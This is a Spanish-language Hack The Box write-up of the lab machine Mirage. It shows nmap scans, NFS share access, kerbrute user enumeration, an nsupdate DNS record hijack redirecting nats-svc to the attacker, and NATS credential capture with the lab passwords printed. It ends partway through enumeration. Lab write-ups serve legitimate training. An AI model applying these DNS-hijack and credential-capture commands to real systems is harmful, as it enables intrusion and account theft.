Mirage inicia en el servicio NFS, donde se encontraron dos archivos que indican configuraciones, comandos y software utilizado. Se identifico una configuracion en el servidor DNS que permitia agregar registros, esto permitio la captura de credenciales para el servidor NATS donde posteriormente se extrajeron otro par de credenciales para recabar informacion para Bloodhound. Con el analisis en este ultimo se logro el acceso a diferentes usuarios a traves de grupos, usuarios y permisos. Finalmente, se logro identificar la configuracion y requisitos para explotar ESC10 para escalar privilegios.

Nombre	Mirage 0
OS	Windows
Puntos	Retired
Dificultad	Hard
Fecha de Salida	2025-07-19
IP	10.10.11.78
Maker	EmSec ctrlzero
Rated	{ "type": "bar", "data": { "labels": ["Cake", "VeryEasy", "Easy", "TooEasy", "Medium", "BitHard","Hard","TooHard","ExHard","BrainFuck"], "datasets": [{ "label": "User Rated Difficulty", "data": [64, 14, 63, 201, 312, 389, 757, 524, 179, 133], "backgroundColor": ["#9fef00","#9fef00","#9fef00", "#ffaf00","#ffaf00","#ffaf00","#ffaf00", "#ff3e3e","#ff3e3e","#ff3e3e"] }] }, "options": { "scales": { "xAxes": [{"display": false}], "yAxes": [{"display": false}] }, "legend": {"labels": {"fontColor": "white"}}, "responsive": true } }

Recon

nmap

nmap muestra multiples puertos abiertos: dns (53), kerberos (88), http (80), nfs (111), ldap (389), smb (445), winrm (5985), ntp (123).

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198


# Nmap 7.95 scan initiated Thu Jul 24 15:27:19 2025 as: /usr/lib/nmap/nmap --privileged -p53,88,111,135,139,389,445,464,593,636,2049,3268,3269,4222,5985,9389,47001,49664,49665,49666,49667,49668,54308,56003,56011,56012,56025,56030,56053,56070 -sV -sC -oN nmap_scan 10.10.11.78
Nmap scan report for 10.10.11.78
Host is up (0.25s latency).

PORT      STATE SERVICE         VERSION
53/tcp    open  domain          (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNS-SD-TCP: 
|     _services
|     _dns-sd
|     _udp
|_    local
88/tcp    open  kerberos-sec    Microsoft Windows Kerberos (server time: 2025-07-25 04:27:37Z)
111/tcp   open  rpcbind         2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc           Microsoft Windows RPC
139/tcp   open  netbios-ssn     Microsoft Windows netbios-ssn
389/tcp   open  ldap            Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http      Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap        Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
2049/tcp  open  status          1 (RPC #100024)
3268/tcp  open  ldap            Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap        Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
4222/tcp  open  vrml-multi-use?
| fingerprint-strings: 
|   GenericLines: 
|     INFO {"server_id":"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V","server_name":"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":216,"client_ip":"10.10.14.104","xkey":"XARPK62ROKWPWOZFGSH26JXAVNQL7Z7EI2TKDHM6XURUQPRWQPPRQRE4"} 
|     -ERR 'Authorization Violation'
|   GetRequest: 
|     INFO {"server_id":"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V","server_name":"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":217,"client_ip":"10.10.14.104","xkey":"XARPK62ROKWPWOZFGSH26JXAVNQL7Z7EI2TKDHM6XURUQPRWQPPRQRE4"} 
|     -ERR 'Authorization Violation'
|   HTTPOptions: 
|     INFO {"server_id":"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V","server_name":"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":218,"client_ip":"10.10.14.104","xkey":"XARPK62ROKWPWOZFGSH26JXAVNQL7Z7EI2TKDHM6XURUQPRWQPPRQRE4"} 
|     -ERR 'Authorization Violation'
|   NULL: 
|     INFO {"server_id":"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V","server_name":"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":215,"client_ip":"10.10.14.104","xkey":"XARPK62ROKWPWOZFGSH26JXAVNQL7Z7EI2TKDHM6XURUQPRWQPPRQRE4"} 
|_    -ERR 'Authentication Timeout'
5985/tcp  open  http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf          .NET Message Framing
47001/tcp open  http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc           Microsoft Windows RPC
49665/tcp open  msrpc           Microsoft Windows RPC
49666/tcp open  msrpc           Microsoft Windows RPC
49667/tcp open  msrpc           Microsoft Windows RPC
49668/tcp open  msrpc           Microsoft Windows RPC
54308/tcp open  msrpc           Microsoft Windows RPC
56003/tcp open  msrpc           Microsoft Windows RPC
56011/tcp open  ncacn_http      Microsoft Windows RPC over HTTP 1.0
56012/tcp open  msrpc           Microsoft Windows RPC
56025/tcp open  msrpc           Microsoft Windows RPC
56030/tcp open  msrpc           Microsoft Windows RPC
56053/tcp open  msrpc           Microsoft Windows RPC
56070/tcp open  msrpc           Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port53-TCP:V=7.95%I=7%D=7/24%Time=6882A550%P=x86_64-pc-linux-gnu%r(DNS-
SF:SD-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04
SF:_udp\x05local\0\0\x0c\0\x01");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port4222-TCP:V=7.95%I=7%D=7/24%Time=6882A53D%P=x86_64-pc-linux-gnu%r(NU
SF:LL,1D1,"INFO\x20{\"server_id\":\"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LN
SF:YJS5LRV5UQ4K6OGV4V\",\"server_name\":\"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKM
SF:NH44LNYJS5LRV5UQ4K6OGV4V\",\"version\":\"2\.11\.3\",\"proto\":1,\"git_c
SF:ommit\":\"a82cfda\",\"go\":\"go1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"por
SF:t\":4222,\"headers\":true,\"auth_required\":true,\"max_payload\":104857
SF:6,\"jetstream\":true,\"client_id\":215,\"client_ip\":\"10\.10\.14\.104\
SF:",\"xkey\":\"XARPK62ROKWPWOZFGSH26JXAVNQL7Z7EI2TKDHM6XURUQPRWQPPRQRE4\"
SF:}\x20\r\n-ERR\x20'Authentication\x20Timeout'\r\n")%r(GenericLines,1D2,"
SF:INFO\x20{\"server_id\":\"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5
SF:UQ4K6OGV4V\",\"server_name\":\"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJ
SF:S5LRV5UQ4K6OGV4V\",\"version\":\"2\.11\.3\",\"proto\":1,\"git_commit\":
SF:\"a82cfda\",\"go\":\"go1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"port\":4222
SF:,\"headers\":true,\"auth_required\":true,\"max_payload\":1048576,\"jets
SF:tream\":true,\"client_id\":216,\"client_ip\":\"10\.10\.14\.104\",\"xkey
SF:\":\"XARPK62ROKWPWOZFGSH26JXAVNQL7Z7EI2TKDHM6XURUQPRWQPPRQRE4\"}\x20\r\
SF:n-ERR\x20'Authorization\x20Violation'\r\n")%r(GetRequest,1D2,"INFO\x20{
SF:\"server_id\":\"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4
SF:V\",\"server_name\":\"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4
SF:K6OGV4V\",\"version\":\"2\.11\.3\",\"proto\":1,\"git_commit\":\"a82cfda
SF:\",\"go\":\"go1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"port\":4222,\"header
SF:s\":true,\"auth_required\":true,\"max_payload\":1048576,\"jetstream\":t
SF:rue,\"client_id\":217,\"client_ip\":\"10\.10\.14\.104\",\"xkey\":\"XARP
SF:K62ROKWPWOZFGSH26JXAVNQL7Z7EI2TKDHM6XURUQPRWQPPRQRE4\"}\x20\r\n-ERR\x20
SF:'Authorization\x20Violation'\r\n")%r(HTTPOptions,1D2,"INFO\x20{\"server
SF:_id\":\"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V\",\"se
SF:rver_name\":\"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V\
SF:",\"version\":\"2\.11\.3\",\"proto\":1,\"git_commit\":\"a82cfda\",\"go\
SF:":\"go1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"port\":4222,\"headers\":true
SF:,\"auth_required\":true,\"max_payload\":1048576,\"jetstream\":true,\"cl
SF:ient_id\":218,\"client_ip\":\"10\.10\.14\.104\",\"xkey\":\"XARPK62ROKWP
SF:WOZFGSH26JXAVNQL7Z7EI2TKDHM6XURUQPRWQPPRQRE4\"}\x20\r\n-ERR\x20'Authori
SF:zation\x20Violation'\r\n");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m05s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-07-25T04:28:41
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 24 15:29:08 2025 -- 1 IP address (1 host up) scanned in 108.33 seconds

# Nmap 7.95 scan initiated Thu Jul 24 15:27:00 2025 as: /usr/lib/nmap/nmap -sU -sVC --min-rate 10000 -oN nmap_scan_udp 10.10.11.78
Nmap scan report for 10.10.11.78
Host is up (0.25s latency).
Not shown: 991 open|filtered udp ports (no-response)
PORT      STATE  SERVICE      VERSION
53/udp    open   domain       Simple DNS Plus
88/udp    open   kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-25 04:27:08Z)
111/udp   open   rpcbind      2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
123/udp   open   ntp          NTP v3
| ntp-info: 
|_  
389/udp   open   ldap         Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
2049/udp  open   nlockmgr     1-4 (RPC #100021)
18250/udp closed unknown
20309/udp closed unknown
49167/udp closed unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port111-UDP:V=7.95%I=7%D=7/24%Time=6882A531%P=x86_64-pc-linux-gnu%r(ONC
SF:RPC_CALL,18,">\xec\xe3\xca\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01"
SF:);
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m14s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 24 16:06:11 2025 -- 1 IP address (1 host up) scanned in 2350.74 seconds

Agregamos a nuestro archivo /etc/hosts los valores mirage.htb dc01.mirage.htb.

NFS

showmount muestra que existe un recurso compartido, puede acceder cualquiera.

1
2
3
4


❯ showmount -e mirage.htb
Export list for mirage.htb:
/MirageReports (everyone)
❯

Montamos el recurso localmente, se listan dos PDFs.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56


❯ mkdir mirage_mount
❯ sudo mount -t nfs mirage.htb:/MirageReports mirage_mount/ -o nolock
❯ ls -lah mirage_mount
drwxrwxrwx nobody nogroup  64 B  Mon May 26 15:41:57 2025  .
drwxrwxr-x kali   kali    4.0 KB Thu Jul 24 15:32:26 2025  ..
.rwx------ nobody nogroup 8.1 MB Tue May 20 09:08:12 2025  Incident_Report_Missing_DNS_Record_nats-svc.pdf
.rwx------ nobody nogroup 8.9 MB Mon May 26 15:37:21 2025  Mirage_Authentication_Hardening_Report.pdf
❯ exiftool Incident_Report_Missing_DNS_Record_nats-svc.pdf
ExifTool Version Number         : 13.25
File Name                       : Incident_Report_Missing_DNS_Record_nats-svc.pdf
Directory                       : .
File Size                       : 8.5 MB
File Modification Date/Time     : 2025:07:24 15:35:02-06:00
File Access Date/Time           : 2025:07:24 15:34:58-06:00
File Inode Change Date/Time     : 2025:07:24 15:35:30-06:00
File Permissions                : -rwxrwxrwx
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 4
Tagged PDF                      : Yes
Language                        : en-PH
Title                           : Investigative Reporting Outline Doc in Black Grey Teal Modern Type Style
Creator                         : Canva
Producer                        : Canva
Create Date                     : 2025:05:20 15:07:45+00:00
Modify Date                     : 2025:05:20 15:07:45+00:00
Keywords                        : DAGn7vmxkJQ, BAFmAHycaxU, 0
Author                          : Mostafa Toumi (EmSec)
❯ exiftool Mirage_Authentication_Hardening_Report.pdf
ExifTool Version Number         : 13.25
File Name                       : Mirage_Authentication_Hardening_Report.pdf
Directory                       : .
File Size                       : 9.4 MB
File Modification Date/Time     : 2025:07:24 15:35:07-06:00
File Access Date/Time           : 2025:07:24 15:35:03-06:00
File Inode Change Date/Time     : 2025:07:24 15:35:30-06:00
File Permissions                : -rwxrwxrwx
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 5
Tagged PDF                      : Yes
Language                        : en-PH
Title                           : Copy of Investigative Reporting Outline Doc in Black Grey Teal Modern Type Style
Creator                         : Canva
Producer                        : Canva
Create Date                     : 2025:05:26 21:36:48+00:00
Modify Date                     : 2025:05:26 21:36:48+00:00
Keywords                        : DAGoYb7hCCM, BAFmAHycaxU, 0
Author                          : Mostafa Toumi (EmSec)
❯

Missing DNS Record

El primer PDF (Incident_Report_Missing_DNS_Record_nats-svc.pdf) indica en un reporte que el subdominio nats-svc.mirage.htb, donde corre NATS messaging system no se encuentra disponible, la razon es ‘scavenging’, es una configuracion en el servidor DNS para eliminar registros con la configuracion por default.

Se muestra en una imagen el intento de autenticacion con este ultimo servicio ademas del nombre de usuario Dev_Account_A que por el nombre podria indicar algun tipo de “nomenclatura”.

Se muestra la configuracion donde observamos que Dynamic Updates esta configurado a Nonsecure and secure lo cual permitiria a cualquier ‘usuario’ registrar/actualizar algun registro DNS. (Question about secure and unsecure DNS registration, Don’t Get Hijacked: Prevalence, Mitigation, and Impact of Non-Secure DNS Dynamic Updates).

Finalmente se indica que nats-svc.mirage.htb “prodria” estar codificado en aplicaciones que aun puedan estar realizando algun tipo de conexion a este y de existir un secuestro a este subdominio podria exponer informacion.

Deprecated NTLM

El segundo PDF (Mirage_Authentication_Hardening_Report.pdf) principalmente menciona el uso de NTLM como un tipo de autenticacion obsoleta y que, Mirage esta “actualizando” a autenticacion por Kerberos. El objetivo es cambiar todo el dominio a este tipo de autenticacion para 2025.

Se observa un posible nombre de usuario al final ad-security.

Active Directory Security Team
IT Security Department – Mirage.htb
Contact: ad-security@mirage.htb

Enumerating Users

Basados en la informacion de la “nomenclatura” de usuarios en los PDFs y posibles usuarios creamos un wordlist con estos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


❯ cat users.txt
Dev_Account_A
Dev_Account_B
Dev_Account_C
Dev_Account_D
Dev_Account_E
Dev_Account_F
Dev_Account_G
ad-security
nats-svc
nats_svc
❯

kerbrute muestra unicamente dos nombres de usuarios validos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


❯ ~/htb/tools/kerbrute userenum --dc dc01.mirage.htb -d mirage.htb users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/24/25 - Ronnie Flathers @ropnop

2025/07/24 16:43:05 >  Using KDC(s):
2025/07/24 16:43:05 >  	dc01.mirage.htb:88

2025/07/24 16:43:05 >  [+] VALID USERNAME:	Dev_Account_B@mirage.htb
2025/07/24 16:43:05 >  [+] VALID USERNAME:	Dev_Account_A@mirage.htb
2025/07/24 16:43:05 >  Done! Tested 10 usernames (2 valid) in 0.252 seconds
❯

Usuario como contrasena no muestra ningun usuario valido.

1
2
3
4
5
6
7


❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec smb dc01.mirage.htb -u valid_users.txt -p valid_users.txt -k
SMB         dc01.mirage.htb 445    dc01             [*]  x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.mirage.htb 445    dc01             [-] mirage.htb\Dev_Account_A:Dev_Account_A KDC_ERR_PREAUTH_FAILED 
SMB         dc01.mirage.htb 445    dc01             [-] mirage.htb\Dev_Account_B:Dev_Account_A KDC_ERR_PREAUTH_FAILED 
SMB         dc01.mirage.htb 445    dc01             [-] mirage.htb\Dev_Account_A:Dev_Account_B KDC_ERR_PREAUTH_FAILED 
SMB         dc01.mirage.htb 445    dc01             [-] mirage.htb\Dev_Account_B:Dev_Account_B KDC_ERR_PREAUTH_FAILED 
❯

DNS Update and Catching Credentials

El servidor DNS esta configurado para permitir actualizar/crear registros dns a cualquier usuario, utilizamos nsupdate para eliminar y agregar un nuevo registro en el servidor. Especificando el subdominio nats-svc.mirage.htb a nuestra direccion IP. La configuracion de nuestro archivo quedaria de la siguiente forma:

1
2
3
4
5
6


server 10.10.11.78
zone mirage.htb.
update delete nats-svc.mirage.htb. A
update add nats-svc.mirage.htb. 3600 A 10.10.14.104
send
; source: chatgpt

Tras especificar el archivo en nsupdate se verifica la existencia del registro.

1
2


nsupdate -v update.txt
dig @10.10.11.78 nats-svc.mirage.htb A +short

El registro parece no estar registrado, tras ejecutar el update/registro y verificarlo con dig observamos que ahora nats-svc.mirage.htb apunta a nuestra IP.

1
2
3
4
5
6


❯ dig @10.10.11.78 nats-svc.mirage.htb A +short
❯ 
❯ nsupdate -v update.txt
❯ dig @10.10.11.78 nats-svc.mirage.htb A +short
10.10.14.104
❯

NATS System Message

NATS corre en el puerto 4222, colocamos netcat a la escucha de este puerto tras el registro. Obtuvimos una solicitud desde el servidor.

1
2
3
4
5


❯ nc -lvvvp 4222
listening on [any] 4222 ...
connect to [10.10.14.104] from mirage.htb [10.10.11.78] 59550
 sent 0, rcvd 0
❯

Instalamos NATS server localmente para monitorear el trafico del puerto 4222.

1
2
3
4
5
6
7
8
9


❯ sudo dpkg -i nats-server-v2.11.6-amd64.deb
[sudo] password for kali: 
Selecting previously unselected package nats-server.
(Reading database ... 564328 files and directories currently installed.)
Preparing to unpack nats-server-v2.11.6-amd64.deb ...
Unpacking nats-server (2.11.6) ...
Setting up nats-server (2.11.6) ...
Processing triggers for kali-menu (2025.2.7) ...
❯

Ejecutamos nats-server con la flag -V se muestra que existe autenticacion por parte de mirage con el usuario Dev_Account_A aunque no muestra la contrasena y muestra que TLS no es requerido.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21


❯ nats-server -V
[89096] 2025/07/24 16:37:48.188034 [INF] Starting nats-server
[89096] 2025/07/24 16:37:48.188100 [INF]   Version:  2.11.6
[89096] 2025/07/24 16:37:48.188104 [INF]   Git:      [bc813ee]
[89096] 2025/07/24 16:37:48.188106 [INF]   Name:     NCDNCNVFKHC2CR2EKT6XQ7GOFXVHY26SKDD6JTDLLA3WTS4HE4BLR3DX
[89096] 2025/07/24 16:37:48.188108 [INF]   ID:       NCDNCNVFKHC2CR2EKT6XQ7GOFXVHY26SKDD6JTDLLA3WTS4HE4BLR3DX
[89096] 2025/07/24 16:37:48.188557 [INF] Listening for client connections on 0.0.0.0:4222
[89096] 2025/07/24 16:37:48.188867 [INF] Server is ready
[89096] 2025/07/24 16:38:02.973578 [TRC] 10.10.11.78:56026 - cid:5 - <<- [CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"[REDACTED]","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":true,"no_responders":true}]
[89096] 2025/07/24 16:38:02.973764 [TRC] 10.10.11.78:56026 - cid:5 - <<- [PING]
[89096] 2025/07/24 16:38:02.973792 [TRC] 10.10.11.78:56026 - cid:5 - ->> [PONG]
[89096] 2025/07/24 16:38:03.247245 [TRC] 10.10.11.78:56026 - cid:5 - <<- [PING]
[89096] 2025/07/24 16:38:03.247289 [TRC] 10.10.11.78:56026 - cid:5 - ->> [PONG]
[89096] 2025/07/24 16:38:03.495382 [TRC] 10.10.11.78:56026 - cid:5 - <<- [PING]
[89096] 2025/07/24 16:38:03.495417 [TRC] 10.10.11.78:56026 - cid:5 - ->> [PONG]
[89096] 2025/07/24 16:38:03.743772 [TRC] 10.10.11.78:56026 - cid:5 - <<- [PING]
[89096] 2025/07/24 16:38:03.743808 [TRC] 10.10.11.78:56026 - cid:5 - ->> [PONG]
[89096] 2025/07/24 16:38:03.991746 [TRC] 10.10.11.78:56026 - cid:5 - <<- [PING]
[89096] 2025/07/24 16:38:03.991766 [TRC] 10.10.11.78:56026 - cid:5 - ->> [PONG]
[89096] 2025/07/24 16:38:04.239920 [TRC] 10.10.11.78:56026 - cid:5 - <<- [PING]
[89096] 2025/07/24 16:38:04.239951 [TRC] 10.10.11.78:56026 - cid:5 - ->> [PONG]

Ejecutamos wireshark donde filtramos por el puerto 4222. Observamos una conexion donde se muestra la autenticacion con las credenciales de usuario.

1
2
3


INFO {"server_id":"NCDNCNVFKHC2CR2EKT6XQ7GOFXVHY26SKDD6JTDLLA3WTS4HE4BLR3DX","server_name":"NCDNCNVFKHC2CR2EKT6XQ7GOFXVHY26SKDD6JTDLLA3WTS4HE4BLR3DX","version":"2.11.6","proto":1,"git_commit":"bc813ee","go":"go1.24.4","host":"0.0.0.0","port":4222,"headers":true,"max_payload":1048576,"client_id":5,"client_ip":"10.10.11.78","xkey":"XAHH7IEAH4TJXIHLWHSRM2ZWG2Z3D3OA6ZJQ23AJYRKELVO2R3UCBHKG"} 

CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"hx5h7F5554fP@1337!","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":true,"no_responders":true}

NATS streams

Con el cliente nats enumeramos los streams se lista el stream auth_logs.

1
2
3
4
5
6
7
8


❯ nats -s nats://Dev_Account_A:'hx5h7F5554fP@1337!'@10.10.11.78:4222 stream ls
╭─────────────────────────────────────────────────────────────────────────────────╮
│                                     Streams                                     │
├───────────┬─────────────┬─────────────────────┬──────────┬───────┬──────────────┤
│ Name      │ Description │ Created             │ Messages │ Size  │ Last Message │
├───────────┼─────────────┼─────────────────────┼──────────┼───────┼──────────────┤
│ auth_logs │             │ 2025-05-05 01:18:19 │ 5        │ 570 B │ 80d22h45m18s │
╰───────────┴─────────────┴─────────────────────┴──────────┴───────┴──────────────╯

Con view observamos los mensajes en el stream donde se muestran un par de credenciales.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23


❯ nats -s nats://Dev_Account_A:'hx5h7F5554fP@1337!'@10.10.11.78:4222 stream view auth_logs
[1] Subject: logs.auth Received: 2025-05-05 01:18:56
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}


[2] Subject: logs.auth Received: 2025-05-05 01:19:24
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}


[3] Subject: logs.auth Received: 2025-05-05 01:19:25
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}


[4] Subject: logs.auth Received: 2025-05-05 01:19:26
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}


[5] Subject: logs.auth Received: 2025-05-05 01:19:27
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}


17:04:52 Reached apparent end of data
❯

1

david.jjackson : pN8kQmn6b86!1234@

User - david.jjackson

Kerbrute muestra el uusario como valido.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


❯ ~/htb/tools/kerbrute userenum --dc dc01.mirage.htb -d mirage.htb users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
